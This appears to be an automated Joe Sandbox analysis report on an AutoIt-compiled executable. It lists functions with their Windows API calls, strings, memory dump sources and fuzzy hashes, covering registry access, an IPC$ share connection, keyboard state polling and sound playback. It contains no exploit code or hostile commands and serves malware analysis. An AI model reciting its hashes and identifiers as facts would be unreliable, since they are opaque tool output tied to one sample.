CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

Strings

HKCR, xrefs: 00463CAB
HKEY_USERS, xrefs: 00463D04
$EK, xrefs: 00463C36
HKCU, xrefs: 00463CF3
HKEY_CURRENT_CONFIG, xrefs: 00463CC0
HKCC, xrefs: 00463CD1
HKEY_LOCAL_MACHINE, xrefs: 00463C6C
HKEY_CLASSES_ROOT, xrefs: 00463C96
HKU, xrefs: 00463D15
HKEY_CURRENT_USER, xrefs: 00463CE2
HKLM, xrefs: 00463C81

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharUpper
String ID: $EK$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-1980552132
Opcode ID: 8276aaae087ce779344c5fc208d36587247653eb93cfce2328360621810407f9
Instruction ID: ad30a63cd24f7d54607a59822f4ecf4770b9bc0142d55a31a3a5dd16e4feea72
Opcode Fuzzy Hash: 8276aaae087ce779344c5fc208d36587247653eb93cfce2328360621810407f9
Instruction Fuzzy Hash: 0741213410028A9BDF10EF11D851AEB3365AF52345F10441BEC551B293FB78AE4ACB69

Function 004455BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004455D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00445664
GetMenuItemCount.USER32(004C1708), ref: 004456ED
DeleteMenu.USER32(004C1708,00000005,00000000,000000F5,?,?), ref: 0044577D
DeleteMenu.USER32(004C1708,00000004,00000000), ref: 00445785
DeleteMenu.USER32(004C1708,00000006,00000000), ref: 0044578D
DeleteMenu.USER32(004C1708,00000003,00000000), ref: 00445795
GetMenuItemCount.USER32(004C1708), ref: 0044579D
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 004457D3
GetCursorPos.USER32(?), ref: 004457DD
SetForegroundWindow.USER32(00000000), ref: 004457E6
TrackPopupMenuEx.USER32(004C1708,00000000,?,00000000,00000000,00000000), ref: 004457F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00445805

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction ID: 8c316e5e6c6797ab3a2176d1e40451a3ac209fe88f8ea6b3beab8faaca75f620
Opcode Fuzzy Hash: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction Fuzzy Hash: EB71E230641A15BBFF209B15DC49FAABF65FF40368F24021BF618AA2D2C7795C10DB99

Function 0043A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0043A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0043A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0043A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0043A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0043A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2AB

Strings

SOFTWARE\Classes\, xrefs: 0043A17D
\IPC$, xrefs: 0043A1F3
\CLSID, xrefs: 0043A193

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction ID: 36ac115add83da1bd3147b99ffcafd1a036894dfbf49d0a91a3d47e0976b8548
Opcode Fuzzy Hash: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction Fuzzy Hash: 70411A71C10229AACF15EBA5DC85DEEB778FF08314F00456AF801B72A0DB789D15CBA4

Function 004467E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004467FD
__swprintf.LIBCMT ref: 0044680A

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00446834
LoadResource.KERNEL32(?,00000000), ref: 00446840
LockResource.KERNEL32(00000000), ref: 0044684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0044686D
LoadResource.KERNEL32(?,00000000), ref: 0044687F
SizeofResource.KERNEL32(?,00000000), ref: 0044688E
LockResource.KERNEL32(?), ref: 0044689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004468F9

Strings

5K, xrefs: 004467F6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5K
API String ID: 1433390588-2802765362
Opcode ID: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction ID: d697a1fa8781da38c78068c46b0b6ff43c18bd23b22d0c88ecb10fbe5a78bbdf
Opcode Fuzzy Hash: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction Fuzzy Hash: 3731CA7190221AAFEB10AF61DD55EBFBBA8FF09340F018826F901D2151D738D911D779

Function 004425B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004736F4,00000010,?,Bad directive syntax error,0049DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004425D6
LoadStringW.USER32(00000000,?,004736F4,00000010), ref: 004425DD
_wprintf.LIBCMT ref: 00442610
__swprintf.LIBCMT ref: 00442632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004426A1

Strings

Error: , xrefs: 0044266F
%s (%d) : ==> %s.: %s %s, xrefs: 0044260B
., xrefs: 00442687
Line %d (File "%s"):, xrefs: 00442647
Line %d:, xrefs: 0044262C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: bddce8d6d50807ee37d21da54e30933fa5fddeb0f0bdf3a656de57c6af04d4ae
Instruction ID: 6e45d18c7c245d819c2143957a2fa29815b484cd66ec6b662217039c2da16d9e
Opcode Fuzzy Hash: bddce8d6d50807ee37d21da54e30933fa5fddeb0f0bdf3a656de57c6af04d4ae
Instruction Fuzzy Hash: 6F215E3190021ABBCF11AF91DC4AFEE7735BF18308F40046AF505760A2EA79AA15DB68

Function 00447AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00447B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00447B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00447B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00447B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00447B8C

Strings

alias PlayMe, xrefs: 00447B1B
open , xrefs: 00447AF1
play PlayMe wait, xrefs: 00447B76
status PlayMe mode, xrefs: 00447B3D
close PlayMe, xrefs: 00447B53, 00447B80
play PlayMe, xrefs: 00447B87

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: f4254b867bbb18d943fa684cdb411ab766b7861bf0ef52c92d368e590af44ed1
Instruction ID: c629913f0061c8dedb4f08ab5be99ac441f65e11a239b6320b0dcc44f92cb62d
Opcode Fuzzy Hash: f4254b867bbb18d943fa684cdb411ab766b7861bf0ef52c92d368e590af44ed1
Instruction Fuzzy Hash: 3F1196A094015979E720B763CC45EFF7A7CDB91B14F10052B7411770C1DE782A45C5B8

Function 0044778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00447794

Part of subcall function 0041DC38: timeGetTime.WINMM(?,75C0B400,004758AB), ref: 0041DC3C

Sleep.KERNEL32(0000000A), ref: 004477C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004477E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00447806
SetActiveWindow.USER32 ref: 00447825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00447833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00447852
Sleep.KERNEL32(000000FA), ref: 0044785D
IsWindow.USER32 ref: 00447869
EndDialog.USER32(00000000), ref: 0044787A

Strings

BUTTON, xrefs: 004477F8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction ID: 3f3377c3b03e6d66edf864826632aa4226d8703482a69eaeed50c8e58cd4201f
Opcode Fuzzy Hash: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction Fuzzy Hash: CF215370605645AFF7016F20EC89F6A3F29FB44349B00483AF905812B2DB6D5C06DB6D

Function 004502EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32(00000000), ref: 0045034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004503DE
SHGetDesktopFolder.SHELL32(?), ref: 004503F2
CoCreateInstance.OLE32(0048DA8C,00000000,00000001,004B3CF8,?), ref: 0045043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004504AD
CoTaskMemFree.OLE32(?,?), ref: 00450505
_memset.LIBCMT ref: 00450542
SHBrowseForFolderW.SHELL32(?), ref: 0045057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004505A1
CoTaskMemFree.OLE32(00000000), ref: 004505A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004505DF
CoUninitialize.OLE32(00000001,00000000), ref: 004505E1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 062dc47b6f4fbc4db1a79a3821b1d39e3306bf4e01258e0b3f47f8665743b785
Instruction ID: 3586f6fd98b86659115b9bfb8829d1e59e8e8623d16e807983909ebb0081da27
Opcode Fuzzy Hash: 062dc47b6f4fbc4db1a79a3821b1d39e3306bf4e01258e0b3f47f8665743b785
Instruction Fuzzy Hash: 0DB1FA75A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF905EB251DB34ED45CF54

Function 00442E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442ED6
SetKeyboardState.USER32(?), ref: 00442F41
GetAsyncKeyState.USER32(000000A0), ref: 00442F61
GetKeyState.USER32(000000A0), ref: 00442F78
GetAsyncKeyState.USER32(000000A1), ref: 00442FA7
GetKeyState.USER32(000000A1), ref: 00442FB8
GetAsyncKeyState.USER32(00000011), ref: 00442FE4
GetKeyState.USER32(00000011), ref: 00442FF2
GetAsyncKeyState.USER32(00000012), ref: 0044301B
GetKeyState.USER32(00000012), ref: 00443029
GetAsyncKeyState.USER32(0000005B), ref: 00443052
GetKeyState.USER32(0000005B), ref: 00443060

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction ID: 9c45705a8db000e6a4ee7a8628f9c376aea548831c4a3dd55c4c2afd4bab552e
Opcode Fuzzy Hash: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction Fuzzy Hash: 39512860A0478429FB35DFA089007EBBFF45F11744F88459FD5C2562C2DA9CAB8CC76A

Function 0043ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0043ED1E
GetWindowRect.USER32(00000000,?), ref: 0043ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0043ED8E
GetDlgItem.USER32(?,00000002), ref: 0043ED99
GetWindowRect.USER32(00000000,?), ref: 0043EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0043EE01
GetDlgItem.USER32(?,000003E9), ref: 0043EE0F
GetWindowRect.USER32(00000000,?), ref: 0043EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0043EE63
GetDlgItem.USER32(?,000003EA), ref: 0043EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0043EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0043EE9B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction ID: 00737507538eb1ccc85ebbe3006c59c153ea565c734b707143fa93c06e9301c0
Opcode Fuzzy Hash: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction Fuzzy Hash: 7D512171B01209AFDB18DF69CD85AAEBBBAEB88310F14852DF519E72D0E7749D008B14

Function 0041B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B72B), ref: 0041B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0041B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0047D8A6
6F530860.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8D7
6F530860.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8EE
6F530860.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D90A
DeleteObject.GDI32(00000000), ref: 0047D91C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: F530860$Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 552021940-0
Opcode ID: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction ID: aeda5f4c58aedfe1ab235c20283fe4d5ea771f7082be7751d6cf8c6703a47079
Opcode Fuzzy Hash: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction Fuzzy Hash: 7961AB70A01600CFDB26AF15DD88BAAB7B5FF85715F14452FE04686AB0C738A8D1DB8D

Function 0041B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

GetSysColor.USER32(0000000F), ref: 0041B438

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction ID: 9056983834b32c36ed4150570584b1c03209aeafd6b8b45defaf711a91559013
Opcode Fuzzy Hash: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction Fuzzy Hash: 3041C530541100AFDF216F68DC89BFA3766EF46730F148666FDA58A2E6C7348C81C769

Function 0044690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00446923
_wcscpy.LIBCMT ref: 00446934
__wsplitpath.LIBCMT ref: 00446958
__wsplitpath.LIBCMT ref: 00446979
_wcscpy.LIBCMT ref: 0044699B
_wcscpy.LIBCMT ref: 004469B9
_wcscpy.LIBCMT ref: 004469C7
_wcscat.LIBCMT ref: 004469D6
_wcscat.LIBCMT ref: 00446A2B
_wcscat.LIBCMT ref: 00446A61
_wcscat.LIBCMT ref: 00446A73

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction ID: 005bd8409d3bb68de46a5ddcaf555a5972e9497e9b379132242b511ffcb9ea52
Opcode Fuzzy Hash: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction Fuzzy Hash: 3C417EB694512CAFDF61EB91DC85DCB73BCEB44300F4001A7F649A2051EA74ABE88F59

Function 0044D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0049DC00,0049DC00,0049DC00), ref: 0044D7CE
GetDriveTypeW.KERNEL32(?,004B3A70,00000061), ref: 0044D898
_wcscpy.LIBCMT ref: 0044D8C2

Strings

ramdisk, xrefs: 0044D842
all, xrefs: 0044D7D4
fixed, xrefs: 0044D816
network, xrefs: 0044D82C
unknown, xrefs: 0044D859
cdrom, xrefs: 0044D7EA
removable, xrefs: 0044D800

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 27dd89965dd486c355bf12e5958c17b9eceaa65f898452980bc2b070e1fbd423
Instruction ID: 6215e8b66333fdb673da60b32a2a8998b562a6f15a09a5f6086e7d3bbaedb77f
Opcode Fuzzy Hash: 27dd89965dd486c355bf12e5958c17b9eceaa65f898452980bc2b070e1fbd423
Instruction Fuzzy Hash: BB51F734504301AFD700EF15DC91AAFB7A5EF84318F20882FF8A957292EB38DD45CA4A

Function 0040936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004093AB
__itow.LIBCMT ref: 004093DF

Part of subcall function 00421557: _xtow@16.LIBCMT ref: 00421578

Strings

0x%p, xrefs: 00474CAD
%.15g, xrefs: 004093A5
True, xrefs: 00474C8C
False, xrefs: 00474C93

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
